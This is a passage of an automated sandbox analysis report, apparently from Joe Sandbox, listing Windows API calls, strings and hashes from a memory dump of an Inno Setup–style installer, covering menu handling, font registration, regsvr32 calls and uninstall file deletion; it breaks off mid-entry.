• Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422233
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
• Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
• Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
• Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(10000000), ref: 00481A11
• FreeLibrary.KERNEL32(00000000), ref: 00481A25
• SendNotifyMessageA.USER32(0004043A,00000496,00002710,00000000), ref: 00481A97
Strings
• GetCustomSetupExitCode, xrefs: 004818B1
• Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
• DeinitializeSetup, xrefs: 0048190D
• Deinitializing Setup., xrefs: 00481872
• Restarting Windows., xrefs: 00481A72
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
• Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
• Opcode Fuzzy Hash: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
• Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 004616C7
• GetActiveWindow.USER32 ref: 0046172B
• CoInitialize.OLE32(00000000), ref: 0046173F
• SHBrowseForFolder.SHELL32(?), ref: 00461756
• 76C9D120.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
• SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
• SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
• String ID: A
• API String ID: 2698730301-3554254475
• Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                            • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                                            • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                            • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
• Opcode ID: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
• Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
• Opcode Fuzzy Hash: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
• Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
• GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
• GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
• Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A9B9
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
• SetBkColor.GDI32(?,?), ref: 0041AA08
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
• SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
• SetBkColor.GDI32(00000000,?), ref: 0041AAC3
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
• Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
• Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
Uniqueness
Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
• GetSysColor.USER32(00000014), ref: 0044D1B0
• SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
• GetSysColor.USER32(00000010), ref: 0044D202
• SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
• Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
• Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
• Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B745
• GetDC.USER32(?), ref: 0041B751
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
• RealizePalette.GDI32(00000000), ref: 0041B792
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Palette$Select$BitmapCreateFocusRealize
• String ID: %H
• API String ID: 3275473261-1959103961
• Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
• Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32 ref: 0041BA17
                                                                                                                            • GetDC.USER32(?), ref: 0041BA23
                                                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 3275473261-1959103961
                                                                                                                            • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                            • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                                            • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                            • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                                            Strings
                                                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                            • String ID: Deleting Uninstall data files.
                                                                                                                            • API String ID: 1570157960-2568741658
                                                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                                            Strings
                                                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                            • API String ID: 955540645-649663873
                                                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                            • String ID: Explorer
                                                                                                                            • API String ID: 2594429197-512347832
                                                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8), ref: 004783CC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
